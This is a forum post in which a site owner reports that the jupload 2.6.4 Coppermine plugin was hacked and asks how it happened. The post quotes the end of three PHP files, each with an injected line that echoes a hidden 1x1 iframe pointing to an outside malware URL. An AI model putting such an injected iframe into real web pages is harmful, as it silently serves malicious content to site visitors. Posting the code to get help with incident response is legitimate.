my site has been hacked by jupload-2.6.4 i do not know how but it has injected an iframe at the end code of codebase.php in /plugins/jupload/codebase.php
it says Parse error: syntax error, unexpected '<' in ........../fotopermsn/plugins/jupload/codebase.php on line 158this is the ending code of this file:
return jupload_cpg_die(ERROR, "internal error while reading the extension, for file '${CURRENT_PIC_DATA['filename']}'", __FILE__, __LINE__);
}
$CURRENT_PIC_DATA['title'] = str_replace("_", " ", rawurldecode($fmatches[1]));
}
return $CURRENT_PIC_DATA;
}
<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>
i do not know where they have entered from.
can anybody help this is my site: http://fotopermsn.zbavitje.com/
i know that by replacing this file i can fix this but it can happen again and i would like to know how this happened.EDIT:
i saw that it has hacked also the file jupload.inc.php and
config.inc.phpthis is the ending code of this file jupload.inc.php.
$JUPLOAD_CONFIG['version']='2.6.4';
<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>
a
nd the ending code for config.inc.php cpg_db_query("INSERT INTO {$CONFIG['TABLE_CONFIG']} (name, value) VALUES ('$parameterPrefix$paramName', '"
. str_replace('\'', '\\\'', $paramsToStore[$paramName])
. "')"
);
}
}
}//saveJuploadConfigParamInCoppermineDatabase
}<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>
i am replacing these files with the original file.